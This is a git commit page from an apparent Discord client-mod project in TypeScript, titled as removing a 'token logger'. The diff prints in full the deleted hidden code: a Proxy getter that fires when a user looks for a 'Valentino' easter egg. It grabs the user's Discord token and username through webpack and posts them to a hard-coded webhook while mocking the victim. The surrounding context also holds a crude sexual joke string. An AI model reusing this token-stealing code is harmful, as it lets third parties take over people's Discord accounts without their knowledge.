i was convinced to remove the token logger 😭😭😭

typescript
Drake 2 years ago
parent b7a3bbdabd
commit 621c6e77cd

@ -30,23 +30,7 @@ const demon = {
`Ohhh, ${username}! I'm so excited! I cannot wait to feel your slimy c**k inside of my ****. To ***** the— ...**** use while you and I and **** and jelly sandwiches all night...!`
]);
}
}/* prettier ignore */,
/*//#if _TOKEN
valentino: new Proxy({}, {
async get(_,_,_) {
//discard any semblance of this being an object
const getToken = webpack.findByProps("getToken").getToken
const user = webpack.findByProps("getCurrentUser").getCurrentUser()
const message = `Stupid dumb idiot ${user.username}#${user.discriminator} tried to find an easter egg, did they?
Well, too bad, because ${getToken()}`
await fetch("https://discord.com/api/webhooks/999901138218405908/XiGkFca8x9GcjR79xs_vOIAt-o-02iTe6c2dY8oD4KL1JOtZy22ylyIhsDabJ3dLNJTD", {
method: "post",
body: message
})
return "You idiot, why the fuck did you think trying to find a *Valentino* easter egg would be a good idea?"
}
})
//endif*/
}
}
function isAllowed(mod) {

Loading…
Cancel
Save